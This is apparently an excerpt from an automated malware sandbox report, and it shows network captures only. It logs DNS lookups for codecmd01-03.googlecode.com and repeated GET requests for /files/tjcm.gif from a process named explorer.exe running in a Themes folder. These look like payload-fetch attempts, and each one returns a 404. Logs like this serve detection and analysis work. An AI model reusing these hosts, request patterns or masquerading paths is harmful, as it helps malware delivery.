                                              Sep 30, 2024 16:11:40.072653055 CEST8051310142.251.173.82192.168.2.6
                                              Sep 30, 2024 16:11:40.072730064 CEST5131080192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:40.073079109 CEST8051310142.251.173.82192.168.2.6
                                              Sep 30, 2024 16:11:40.073122025 CEST5131080192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:40.076241970 CEST5131080192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:40.076281071 CEST5131080192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:40.081598997 CEST8051310142.251.173.82192.168.2.6
                                              Sep 30, 2024 16:11:40.081753016 CEST5131080192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:40.491275072 CEST5131180192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:40.496402979 CEST805131164.233.184.82192.168.2.6
                                              Sep 30, 2024 16:11:40.496499062 CEST5131180192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:40.528038979 CEST5131180192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:40.532990932 CEST805131164.233.184.82192.168.2.6
                                              Sep 30, 2024 16:11:41.206044912 CEST805131164.233.184.82192.168.2.6
                                              Sep 30, 2024 16:11:41.206073046 CEST805131164.233.184.82192.168.2.6
                                              Sep 30, 2024 16:11:41.206118107 CEST5131180192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:41.206155062 CEST5131180192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:41.208020926 CEST5131180192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:41.208070040 CEST5131180192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:41.516722918 CEST5131280192.168.2.6173.194.76.82
                                              Sep 30, 2024 16:11:41.522502899 CEST8051312173.194.76.82192.168.2.6
                                              Sep 30, 2024 16:11:41.523159027 CEST5131280192.168.2.6173.194.76.82
                                              Sep 30, 2024 16:11:41.523475885 CEST5131280192.168.2.6173.194.76.82
                                              Sep 30, 2024 16:11:41.528592110 CEST8051312173.194.76.82192.168.2.6
                                              Sep 30, 2024 16:11:42.344082117 CEST8051312173.194.76.82192.168.2.6
                                              Sep 30, 2024 16:11:42.344149113 CEST5131280192.168.2.6173.194.76.82
                                              Sep 30, 2024 16:11:42.344157934 CEST8051312173.194.76.82192.168.2.6
                                              Sep 30, 2024 16:11:42.344198942 CEST5131280192.168.2.6173.194.76.82
                                              Sep 30, 2024 16:11:42.364109039 CEST5131280192.168.2.6173.194.76.82
                                              Sep 30, 2024 16:11:42.364269972 CEST5131280192.168.2.6173.194.76.82
                                              Sep 30, 2024 16:11:42.369765997 CEST8051312173.194.76.82192.168.2.6
                                              Sep 30, 2024 16:11:42.369817972 CEST5131280192.168.2.6173.194.76.82
                                              Sep 30, 2024 16:11:43.160825968 CEST5131380192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:43.165783882 CEST8051313142.251.173.82192.168.2.6
                                              Sep 30, 2024 16:11:43.165862083 CEST5131380192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:43.202663898 CEST5131380192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:43.207542896 CEST8051313142.251.173.82192.168.2.6
                                              Sep 30, 2024 16:11:43.939604044 CEST8051313142.251.173.82192.168.2.6
                                              Sep 30, 2024 16:11:43.939629078 CEST8051313142.251.173.82192.168.2.6
                                              Sep 30, 2024 16:11:43.939735889 CEST5131380192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:43.940112114 CEST5131380192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:43.940112114 CEST5131380192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:43.940151930 CEST5131380192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:44.241060972 CEST5131480192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:44.245979071 CEST805131464.233.184.82192.168.2.6
                                              Sep 30, 2024 16:11:44.246048927 CEST5131480192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:44.274765015 CEST5131480192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:44.279675961 CEST805131464.233.184.82192.168.2.6
                                              Sep 30, 2024 16:11:44.959202051 CEST805131464.233.184.82192.168.2.6
                                              Sep 30, 2024 16:11:44.959264994 CEST805131464.233.184.82192.168.2.6
                                              Sep 30, 2024 16:11:44.959450960 CEST5131480192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:44.959450960 CEST5131480192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:44.959727049 CEST5131480192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:44.960253000 CEST5131480192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:45.662596941 CEST5131580192.168.2.6173.194.76.82
                                              Sep 30, 2024 16:11:45.668191910 CEST8051315173.194.76.82192.168.2.6
                                              Sep 30, 2024 16:11:45.668385983 CEST5131580192.168.2.6173.194.76.82
                                              Sep 30, 2024 16:11:45.696669102 CEST5131580192.168.2.6173.194.76.82
                                              Sep 30, 2024 16:11:45.704139948 CEST8051315173.194.76.82192.168.2.6
                                              Sep 30, 2024 16:11:46.379074097 CEST8051315173.194.76.82192.168.2.6
                                              Sep 30, 2024 16:11:46.379151106 CEST8051315173.194.76.82192.168.2.6
                                              Sep 30, 2024 16:11:46.379241943 CEST5131580192.168.2.6173.194.76.82
                                              Sep 30, 2024 16:11:46.382081985 CEST5131580192.168.2.6173.194.76.82
                                              Sep 30, 2024 16:11:46.382144928 CEST5131580192.168.2.6173.194.76.82
                                              Sep 30, 2024 16:11:46.746514082 CEST5131680192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:46.751633883 CEST8051316142.251.173.82192.168.2.6
                                              Sep 30, 2024 16:11:46.751746893 CEST5131680192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:46.778513908 CEST5131680192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:46.783624887 CEST8051316142.251.173.82192.168.2.6
                                              Sep 30, 2024 16:11:47.501180887 CEST8051316142.251.173.82192.168.2.6
                                              Sep 30, 2024 16:11:47.501305103 CEST8051316142.251.173.82192.168.2.6
                                              Sep 30, 2024 16:11:47.501470089 CEST5131680192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:47.511698008 CEST5131680192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:47.511755943 CEST5131680192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:48.002810001 CEST5131780192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:48.008908033 CEST805131764.233.184.82192.168.2.6
                                              Sep 30, 2024 16:11:48.008994102 CEST5131780192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:48.009186983 CEST5131780192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:48.014296055 CEST805131764.233.184.82192.168.2.6
                                              Sep 30, 2024 16:11:48.734287977 CEST805131764.233.184.82192.168.2.6
                                              Sep 30, 2024 16:11:48.734375000 CEST5131780192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:48.735145092 CEST805131764.233.184.82192.168.2.6
                                              Sep 30, 2024 16:11:48.735198975 CEST5131780192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:48.745775938 CEST5131780192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:48.746021032 CEST5131780192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:49.396151066 CEST5131880192.168.2.6173.194.76.82
                                              Sep 30, 2024 16:11:49.404067039 CEST8051318173.194.76.82192.168.2.6
                                              Sep 30, 2024 16:11:49.404174089 CEST5131880192.168.2.6173.194.76.82
                                              Sep 30, 2024 16:11:49.449410915 CEST5131880192.168.2.6173.194.76.82
                                              Sep 30, 2024 16:11:49.794190884 CEST8051318173.194.76.82192.168.2.6
                                              Sep 30, 2024 16:11:50.112622023 CEST8051318173.194.76.82192.168.2.6
                                              Sep 30, 2024 16:11:50.112646103 CEST8051318173.194.76.82192.168.2.6
                                              Sep 30, 2024 16:11:50.112689972 CEST5131880192.168.2.6173.194.76.82
                                              Sep 30, 2024 16:11:50.112716913 CEST5131880192.168.2.6173.194.76.82
                                              Sep 30, 2024 16:11:50.173362970 CEST5131880192.168.2.6173.194.76.82
                                              Sep 30, 2024 16:11:50.173437119 CEST5131880192.168.2.6173.194.76.82
                                              Sep 30, 2024 16:11:50.698328018 CEST5131980192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:50.703263044 CEST8051319142.251.173.82192.168.2.6
                                              Sep 30, 2024 16:11:50.703973055 CEST5131980192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:50.715976000 CEST5131980192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:50.720957041 CEST8051319142.251.173.82192.168.2.6
                                              Sep 30, 2024 16:11:51.409214020 CEST8051319142.251.173.82192.168.2.6
                                              Sep 30, 2024 16:11:51.409243107 CEST8051319142.251.173.82192.168.2.6
                                              Sep 30, 2024 16:11:51.409281969 CEST5131980192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:51.409327030 CEST5131980192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:51.409957886 CEST5131980192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:51.409976006 CEST5131980192.168.2.6142.251.173.82
                                              Sep 30, 2024 16:11:51.842133045 CEST5132080192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:51.847206116 CEST805132064.233.184.82192.168.2.6
                                              Sep 30, 2024 16:11:51.847296953 CEST5132080192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:51.871998072 CEST5132080192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:51.877207041 CEST805132064.233.184.82192.168.2.6
                                              Sep 30, 2024 16:11:52.558672905 CEST805132064.233.184.82192.168.2.6
                                              Sep 30, 2024 16:11:52.558711052 CEST805132064.233.184.82192.168.2.6
                                              Sep 30, 2024 16:11:52.558749914 CEST5132080192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:52.558790922 CEST5132080192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:52.559375048 CEST5132080192.168.2.664.233.184.82
                                              Sep 30, 2024 16:11:52.559406042 CEST5132080192.168.2.664.233.184.82
                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 30, 2024 16:07:59.818425894 CEST6088453192.168.2.61.1.1.1
                                              Sep 30, 2024 16:08:00.805252075 CEST6088453192.168.2.61.1.1.1
                                              Sep 30, 2024 16:08:00.826872110 CEST53608841.1.1.1192.168.2.6
                                              Sep 30, 2024 16:08:00.846295118 CEST53608841.1.1.1192.168.2.6
                                              Sep 30, 2024 16:08:03.477102041 CEST5935353192.168.2.61.1.1.1
                                              Sep 30, 2024 16:08:03.490076065 CEST53593531.1.1.1192.168.2.6
                                              Sep 30, 2024 16:08:05.703006029 CEST6410653192.168.2.61.1.1.1
                                              Sep 30, 2024 16:08:05.713392019 CEST53641061.1.1.1192.168.2.6
                                              Sep 30, 2024 16:08:07.375216007 CEST53562651.1.1.1192.168.2.6
                                              Sep 30, 2024 16:08:22.063033104 CEST5362238162.159.36.2192.168.2.6
                                              Sep 30, 2024 16:08:22.583054066 CEST5108653192.168.2.61.1.1.1
                                              Sep 30, 2024 16:08:22.592835903 CEST53510861.1.1.1192.168.2.6
                                              Sep 30, 2024 16:09:43.583322048 CEST5054653192.168.2.61.1.1.1
                                              Sep 30, 2024 16:09:43.595138073 CEST53505461.1.1.1192.168.2.6
                                              Sep 30, 2024 16:09:44.679295063 CEST5562853192.168.2.61.1.1.1
                                              Sep 30, 2024 16:09:44.702671051 CEST53556281.1.1.1192.168.2.6
                                              Sep 30, 2024 16:09:59.944694996 CEST6104153192.168.2.61.1.1.1
                                              Sep 30, 2024 16:09:59.952662945 CEST53610411.1.1.1192.168.2.6
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Sep 30, 2024 16:07:59.818425894 CEST192.168.2.61.1.1.10x4728Standard query (0)codecmd01.googlecode.comA (IP address)IN (0x0001)false
                                              Sep 30, 2024 16:08:00.805252075 CEST192.168.2.61.1.1.10x4728Standard query (0)codecmd01.googlecode.comA (IP address)IN (0x0001)false
                                              Sep 30, 2024 16:08:03.477102041 CEST192.168.2.61.1.1.10xd5a8Standard query (0)codecmd02.googlecode.comA (IP address)IN (0x0001)false
                                              Sep 30, 2024 16:08:05.703006029 CEST192.168.2.61.1.1.10xca92Standard query (0)codecmd03.googlecode.comA (IP address)IN (0x0001)false
                                              Sep 30, 2024 16:08:22.583054066 CEST192.168.2.61.1.1.10x64ebStandard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                              Sep 30, 2024 16:09:43.583322048 CEST192.168.2.61.1.1.10x76beStandard query (0)codecmd03.googlecode.comA (IP address)IN (0x0001)false
                                              Sep 30, 2024 16:09:44.679295063 CEST192.168.2.61.1.1.10xf1f9Standard query (0)codecmd01.googlecode.comA (IP address)IN (0x0001)false
                                              Sep 30, 2024 16:09:59.944694996 CEST192.168.2.61.1.1.10x93a6Standard query (0)codecmd02.googlecode.comA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Sep 30, 2024 16:08:00.846295118 CEST1.1.1.1192.168.2.60x4728No error (0)codecmd01.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 30, 2024 16:08:00.846295118 CEST1.1.1.1192.168.2.60x4728No error (0)googlecode.l.googleusercontent.com64.233.167.82A (IP address)IN (0x0001)false
                                              Sep 30, 2024 16:08:03.490076065 CEST1.1.1.1192.168.2.60xd5a8No error (0)codecmd02.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 30, 2024 16:08:03.490076065 CEST1.1.1.1192.168.2.60xd5a8No error (0)googlecode.l.googleusercontent.com108.177.15.82A (IP address)IN (0x0001)false
                                              Sep 30, 2024 16:08:05.713392019 CEST1.1.1.1192.168.2.60xca92No error (0)codecmd03.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 30, 2024 16:08:05.713392019 CEST1.1.1.1192.168.2.60xca92No error (0)googlecode.l.googleusercontent.com142.250.110.82A (IP address)IN (0x0001)false
                                              Sep 30, 2024 16:08:22.592835903 CEST1.1.1.1192.168.2.60x64ebName error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                              Sep 30, 2024 16:09:43.595138073 CEST1.1.1.1192.168.2.60x76beNo error (0)codecmd03.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 30, 2024 16:09:43.595138073 CEST1.1.1.1192.168.2.60x76beNo error (0)googlecode.l.googleusercontent.com64.233.184.82A (IP address)IN (0x0001)false
                                              Sep 30, 2024 16:09:44.702671051 CEST1.1.1.1192.168.2.60xf1f9No error (0)codecmd01.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 30, 2024 16:09:44.702671051 CEST1.1.1.1192.168.2.60xf1f9No error (0)googlecode.l.googleusercontent.com173.194.76.82A (IP address)IN (0x0001)false
                                              Sep 30, 2024 16:09:59.952662945 CEST1.1.1.1192.168.2.60x93a6No error (0)codecmd02.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 30, 2024 16:09:59.952662945 CEST1.1.1.1192.168.2.60x93a6No error (0)googlecode.l.googleusercontent.com142.251.173.82A (IP address)IN (0x0001)false
                                              • codecmd01.googlecode.com
                                              • codecmd02.googlecode.com
                                              • codecmd03.googlecode.com
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.665472172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:01.553464890 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:02.130306005 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:02 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:02.130327940 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.665473108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:03.497498035 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:04.208813906 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:04 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:04.208839893 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.665477142.250.110.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:05.720885038 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:06.481312037 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:06 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:06.481391907 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:08:06.481635094 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.664068172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:07.938189983 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:08.457994938 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:08 GMT
